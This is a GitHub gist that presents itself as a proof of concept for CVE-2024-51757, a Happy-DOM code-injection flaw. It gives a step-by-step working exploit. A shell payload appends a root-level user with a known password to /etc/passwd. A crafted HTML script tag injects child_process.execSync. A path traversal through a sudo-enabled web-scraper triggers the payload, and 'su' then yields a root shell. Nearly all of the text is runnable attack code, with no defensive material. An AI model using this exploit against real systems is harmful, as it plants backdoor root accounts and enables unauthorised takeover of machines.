Skip to content

Instantly share code, notes, and snippets.

@strikoder
Last active December 29, 2025 12:54
Show Gist options
  • Select an option

  • Save strikoder/8ac081e71e3c0bf6040360ead3c1e515 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/8ac081e71e3c0bf6040360ead3c1e515 to your computer and use it in GitHub Desktop.
Proof of concept for CVE-2024-51757 - Happy-DOM privilege escalation vulnerability via /etc/passwd injection

CVE-2024-51757: Happy-DOM Privilege Escalation

Proof of Concept

Step 1: Create Payload Script

File: /tmp/payload.sh

#!/bin/sh
echo 'strikoder:$1$xyz$AtdNQIrMzNYyjUT1XH5IU1:0:0:root:/root:/bin/bash' >> /etc/passwd #su strikoder:abcd1234####

Make executable:

chmod +x /tmp/payload.sh

Step 2: Create Malicious HTML

File: /tmp/payload.html

<script src="https://localhost:80/'+require('child_process').execSync('/tmp/payload.sh')+'"></script>

Step 3: Exploit Path Traversal

Execute with sudo-enabled web-scraper binary (for example):

sudo /usr/bin/web-scraper /root/web_src_downloaded/../../../tmp/payload.html

Step 4: Escalate Privileges

su strikoder
# Password: abcd1234####
id
# uid=0(root) gid=0(root) groups=0(root)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment